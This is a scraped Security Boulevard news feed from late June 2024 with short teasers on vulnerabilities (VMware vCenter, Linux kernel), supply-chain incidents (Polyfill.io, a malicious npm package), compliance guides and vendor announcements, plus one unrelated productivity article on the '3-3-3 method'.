The post News Alert: Infinidat introduces advanced cyber resiliency and recovery solution for enterprises first appeared on The Last Watchdog.

The post News Alert: Infinidat introduces advanced cyber resiliency and recovery solution for enterprises appeared first on Security Boulevard.

Before yesterdayMain stream

Webinar: How to secure Microsoft Copilot & Gen AI

27 June 2024 at 16:56

How to secure Microsoft Copilot & Gen AI July 10, 1:00 pm Eastern Time As organizations rapidly adopt Microsoft Copilot...

The post Webinar: How to secure Microsoft Copilot & Gen AI appeared first on Symmetry Systems.

The post Webinar: How to secure Microsoft Copilot & Gen AI appeared first on Security Boulevard.

The True Cost of Bad Code in Software Development

By: Liz Ryan
27 June 2024 at 13:00

Despite advances in technology and methodologies, the costs associated with fixing bad code continue to escalate, impacting businesses financially and operationally. But what is bad code, what are the clear markers of its negative impact, and how can organizations overcome it?

The post The True Cost of Bad Code in Software Development appeared first on Security Boulevard.

Container Security Scanning: Vulnerabilities, Risks and Tooling

27 June 2024 at 15:34

Container security is crucial in the age of microservices and DevOps. Learn about common container vulnerabilities, container security scanning, and popular tools to secure your containers in this comprehensive guide.

The post Container Security Scanning: Vulnerabilities, Risks and Tooling appeared first on Security Boulevard.

Third-Party Trust Issues: AppSec Learns from Polyfill

27 June 2024 at 13:58

By now, you’ve likely seen the LinkedIn posts, the media stories, and even some formerly-known-as “Tweets”: The latest exploit to hit front pages is the malicious use of polyfill.io, a popular library used to power a large number of web browsers. As per usual, there’s a ton of speculation about what’s happening. Is this the […]

The post Third-Party Trust Issues: AppSec Learns from Polyfill appeared first on OX Security.

The post Third-Party Trust Issues: AppSec Learns from Polyfill appeared first on Security Boulevard.

Boost Hybrid Cloud Strategy with Cloudera and comforte’s Data-Centric Security

27 June 2024 at 12:45

Meta Description: Discover how data-centric security supports the hybrid cloud strategy of Cloudera Data Platform users. Learn about the benefits of hybrid cloud, data management, and secure data sharing.

The post Boost Hybrid Cloud Strategy with Cloudera and comforte’s Data-Centric Security appeared first on Security Boulevard.

VMware vCenter RCE Vulnerability: What You Need to Know

27 June 2024 at 12:21

VMware, the virtualization technology giant owned by Broadcom, has recently released a security advisory addressing several critical vulnerabilities discovered in its vCenter Server application. Read on to learn more.  Tell me more about VMware vCenter RCE vulnerability  If left unpatched, these vulnerabilities could allow malicious actors to execute remote code or escalate privileges on affected systems. As vCenter Server serves ... Read More

The post VMware vCenter RCE Vulnerability: What You Need to Know appeared first on Nuspire.

The post VMware vCenter RCE Vulnerability: What You Need to Know appeared first on Security Boulevard.

Identity Gaps: The Need to Use Both x.509 & FIDO

27 June 2024 at 11:06

Over the last month, several large organizations suffered from major cybersecurity breaches involving stolen credentials....

The post Identity Gaps: The Need to Use Both x.509 & FIDO appeared first on Axiad.

The post Identity Gaps: The Need to Use Both x.509 & FIDO appeared first on Security Boulevard.

A Step-by-Step Guide to Getting a SOC 2® Report

27 June 2024 at 11:00

Ensuring the security of your customers’ and partners’ data is paramount in today’s digital environment. That’s why Service Organization Control 2 (SOC 2®) compliance has emerged as a widely recognized cybersecurity audit framework. SOC 2® reporting has been adopted by more businesses to demonstrate their commitment to strong cybersecurity practices. Let’s explore what a SOC 2® report...

The post A Step-by-Step Guide to Getting a SOC 2® Report appeared first on Hyperproof.

The post A Step-by-Step Guide to Getting a SOC 2® Report appeared first on Security Boulevard.

The Evolving SSL/TLS Certificate Lifecycle & How to Manage the Changes

By: Henry Lam
27 June 2024 at 12:00

Certificates are dynamic security solutions within PKI, crucial for verifying identities and encrypting communications. Understanding their lifecycle is vital to prevent mismanagement. Learn about lifecycle stages, the impact of reduced validity periods, and the benefits of automated management.

The post The Evolving SSL/TLS Certificate Lifecycle & How to Manage the Changes appeared first on Security Boulevard.

How to Ensure Your Data is Ready for an AI-Driven SOC 

27 June 2024 at 06:27

In 2024, artificial intelligence (AI) has prompted 65% of organizations to evolve their security strategies. Across the globe, this technological revolution has pushed security and business leaders to think critically about how to apply AI as a force multiplier to…

The post How to Ensure Your Data is Ready for an AI-Driven SOC  appeared first on LogRhythm.

The post How to Ensure Your Data is Ready for an AI-Driven SOC  appeared first on Security Boulevard.

Best 7 CCPA Compliance Tools in 2024

27 June 2024 at 05:29

In today’s data-driven world, ensuring compliance with data privacy laws like the California Consumer Privacy Act (CCPA) is crucial for businesses. Non-compliance can lead to hefty fines and reputational damage. In this blog, we’ll introduce you to the best 7 CCPA compliance tools in 2024 to make your compliance journey smoother and more efficient. What […]

The post Best 7 CCPA Compliance Tools in 2024 appeared first on Centraleyes.

The post Best 7 CCPA Compliance Tools in 2024 appeared first on Security Boulevard.

Multiple Linux Kernel Vulnerabilities Lead to Denial of Service

27 June 2024 at 05:00

Several vulnerabilities have been identified in the Linux kernel, potentially leading to denial of service or privilege escalation. However, the good news is the patches are already available for them. Ubuntu and Debian have already released them in the new Linux kernel security update.   Recent Linux Kernel Vulnerabilities and Fixes   Below are some […]

The post Multiple Linux Kernel Vulnerabilities Lead to Denial of Service appeared first on TuxCare.

The post Multiple Linux Kernel Vulnerabilities Lead to Denial of Service appeared first on Security Boulevard.

USENIX Security ’23 – Assessing Anonymity Techniques Employed in German Court Decisions: A De-Anonymization Experiment

26 June 2024 at 15:00

Authors/Presenters:Dominic Deuber, Michael Keuchen, Nicolas Christin

Many thanks to USENIX for publishing their outstanding USENIX Security ’23 Presenter’s content, and the organizations strong commitment to Open Access.
Originating from the conference’s events situated at the Anaheim Marriott; and via the organizations YouTube channel.

Permalink

The post USENIX Security ’23 – Assessing Anonymity Techniques Employed in German Court Decisions: A De-Anonymization Experiment appeared first on Security Boulevard.

A Milestone of Excellence: Praetorian Security Inc. Named to Inc.’s Best Workplaces

26 June 2024 at 14:07

This recognition is more than just a badge of honor; it is a testament to what makes Praetorian an exceptional place to work. The dedication exhibited daily by each team member truly sets us apart, highlighting the organic culture shaped by our people and the unwavering support from everyone at our company. Why This Matters […]

The post A Milestone of Excellence: Praetorian Security Inc. Named to Inc.’s Best Workplaces appeared first on Praetorian.

The post A Milestone of Excellence: Praetorian Security Inc. Named to Inc.’s Best Workplaces appeared first on Security Boulevard.

How NinjaOne’s New MDM Capabilities Transform IT Management

26 June 2024 at 17:45

IT security teams are tasked with protecting an increasingly mobile work environment—managing a myriad of devices efficiently and securely. Addressing this need, NinjaOne has launched its new Mobile Device Management (MDM) capabilities, marking a significant milestone in their mission to […]

The post How NinjaOne’s New MDM Capabilities Transform IT Management appeared first on TechSpective.

The post How NinjaOne’s New MDM Capabilities Transform IT Management appeared first on Security Boulevard.

News Alert: FireTail unveils free access to its enterprise-level API security platform — to all

26 June 2024 at 15:15

McLean, Va., June 26, 2024, CyberNewsWire — FireTail today announced a free version of its enterprise-level API security tools, making them accessible to developers and organizations of all sizes.

•FireTail’s unique combination of open-source code libraries, inline API call evaluation, … (more…)

The post News Alert: FireTail unveils free access to its enterprise-level API security platform — to all first appeared on The Last Watchdog.

The post News Alert: FireTail unveils free access to its enterprise-level API security platform — to all appeared first on Security Boulevard.

Protecting the Soft Underbelly of the Data Center

26 June 2024 at 14:48

The CIS Controls list hardware asset management as the most important security control, but how many organizations keep track of the components that make up the servers in their datacenter? Components such as baseboard management controllers, UEFI firmware, SSDs, CPUs, TPMs, and network cards are incredibly complex with their own sub-components. 

The post Protecting the Soft Underbelly of the Data Center appeared first on Eclypsium | Supply Chain Security for the Modern Enterprise.

The post Protecting the Soft Underbelly of the Data Center appeared first on Security Boulevard.

Scattered Spider: Evolving & Resilient Group Proves Need for Constant Defender Vigilance

26 June 2024 at 13:30

Recent reporting highlighted new techniques for a prominent group that already possessed a deep set of capabilities. As the pace of adversary TTP evolution increases, organizations must stay vigilant and regularly reassess their defenses against the latest TTPs used by relevant threats. This holds true even amid reports of threat group disruptions, as many groups continue to demonstrate resilience in the face of law enforcement operations and other pressures. 

The post Scattered Spider: Evolving & Resilient Group Proves Need for Constant Defender Vigilance appeared first on Security Boulevard.

Get More Done With the ‘3-3-3 Method’

26 June 2024 at 12:00

Sometimes, determining which projects you should devote your time and energy to first takes energy you don’t have to spare (which is why we have tips for how to do it). But even when you know what tasks need to be done, you still need to figure out how to prioritize them. Try the 3-3-3 method.

What is the 3-3-3 method?

This technique comes from Oliver Burkeman, author of Four Thousand Weeks: Time Management for Mortals ($13.99). He advocates planning each workday around a 3-3-3 model, first devoting three hours to deep work on your most important project. Next, complete three other urgent tasks that don’t require three hours of focus. Finally, do three “maintenance” tasks, like cleaning, answering emails, or scheduling other work.

To figure out which tasks are which, I recommend using a prioritization method like the Eisenhower matrix, which involves using a quadrant system to divvy up your responsibilities by urgency and importance. You'll want to consider not only how timely the things you need to do are, as well as how many resources they'll consume.

Why the 3-3-3 method works

What distinguishes this method from other productivity hacks are those first three hours of deep work. Jumping into them first means you’ll be fresh, focused, and more likely to be able to jump into a task without getting distracted. Keep those three hours free of emails, texts, chit-chat, or other menial duties, to the best of your ability. (Check out a full guide to engaging in deep work here.)

Deep work yields major productivity, so you’ll get a lot accomplished if you commit to it, but you can’t stay in that mindset forever. You’ll top out after about three hours, so it’s best to have those three other, smaller tasks lined up and ready to go so you can stay productive even while downshifting into less demanding responsibilities.

Finally, your maintenance tasks give you a chance to get things done while giving your brain a rest. This technique is similar to “eating the frog”—or doing your hardest task first thing—as you’ll feel the same sense of relief when moving onto lesser tasks. Use your maintenance time to prepare for the following day’s work or put finishing touches on whatever you were working on during those three hours of intense focus.

A WIN for Cloud Security with Adaptive Shield and Wiz

26 June 2024 at 11:29

It’s easy to confuse CSPM and SSPM (Cloud Security Posture Management and SaaS Security Posture Management). They both secure assets on the cloud, automatically identify misconfigurations, and detect identity-based threats. The difference between the two lies in the areas that they protect. SSPMs secure SaaS applications, while CSPMs secure cloud services, such as AWS or […]

The post A WIN for Cloud Security with Adaptive Shield and Wiz appeared first on Adaptive Shield.

The post A WIN for Cloud Security with Adaptive Shield and Wiz appeared first on Security Boulevard.

Malicious npm package targets AWS users

26 June 2024 at 11:00

ReversingLabs researchers have made it a priority to monitor public, open source repositories for malicious packages that may lurk on them in recent years. The number and frequency of malicious packages has increased steadily as malicious actors turn to software supply chains for an easy route into hundreds, thousands or even tens of thousands of protected IT environments. 

Many of the packages the RL threat research team has found are what we term “infostealers” — malicious software that is designed to grab sensitive information. For example, our team recently wrote about a package discovered on the NuGet repository, SqzrFramework480.dll, that contained features for capturing a screenshot, sending ping packets, as well as opening a socket and sending data over it. The package contained information — including a graphic — that suggested it was targeting BOZHON Precision Industry Technology Co., a China-based firm that does industrial and digital equipment manufacturing. 

RL researchers frequently discover downloaders and malicious applications designed to fetch other software — so called second (or third) “stages” that are often open source "infostealers" or simple “beacon-backs” that red team operators use to plant a flag within target environments to prove they were successful in breaching defenses. 

Whatever their purpose, all of the packages we detect as malicious are reported to the relevant maintainers of the affected repositories. In our team's experience, they are removed shortly after. That’s good for developers and development teams, as it removes potentially damaging code from public repositories where it might find its way onto developers’ systems, or even integrated into legitimate applications and services. 

But there’s a problem with this approach: The sheer scale of the open source ecosystem is so large that it is impossible for any single group of researchers to keep abreast of and police massive repositories like Python Package Index (PyPI), npm, NuGet, VS Code Marketplace and others. On any given day, RL researchers, using RL Spectra Assure platform, identify dozens of malicious packages spread across these repositories, but far more packages may lurk undetected — suspicious but not overtly malicious. 

The post Malicious npm package targets AWS users appeared first on Security Boulevard.

New Portal Helps Devs Spot Malicious Open Source Packages

26 June 2024 at 10:29

Spotting compromises hidden deep in open source- or commercial supply chains is difficult under the best of circumstances. For developers and development teams tasked with achieving aggressive development and release goals — an environment in which software security and integrity are low priorities — the job is even harder. That’s why, today, ReversingLabs introduced a new offering that helps developers to rapidly assess the security and quality of millions of open source packages spread across platforms such as npm, PyPI and RubyGems. 

Spectra Assure Community is a tool that enables developers, product security teams, and release managers to scan open source components to identify the best building blocks for their products. Using Spectra’s unique combination of advanced threat detection, comprehensive analysis, and standardized assessments, it helps developers determine whether packages that they wish to use are free from malicious code and supply chain attacks. 

The post New Portal Helps Devs Spot Malicious Open Source Packages appeared first on Security Boulevard.

Prioritizing Exposures vs. Prioritizing Actions 

26 June 2024 at 08:39

Organizations face an overwhelming number of vulnerabilities and threats. The traditional approach has been to prioritize exposures—identifying and addressing the most critical vulnerabilities first. However, this method, while logical on the surface, has significant limitations. At Veriti, we advocate for a different strategy: prioritizing actions. By focusing on remediations rather than merely cataloging exposures, we believe […]

The post Prioritizing Exposures vs. Prioritizing Actions  appeared first on VERITI.

The post Prioritizing Exposures vs. Prioritizing Actions  appeared first on Security Boulevard.

❌
❌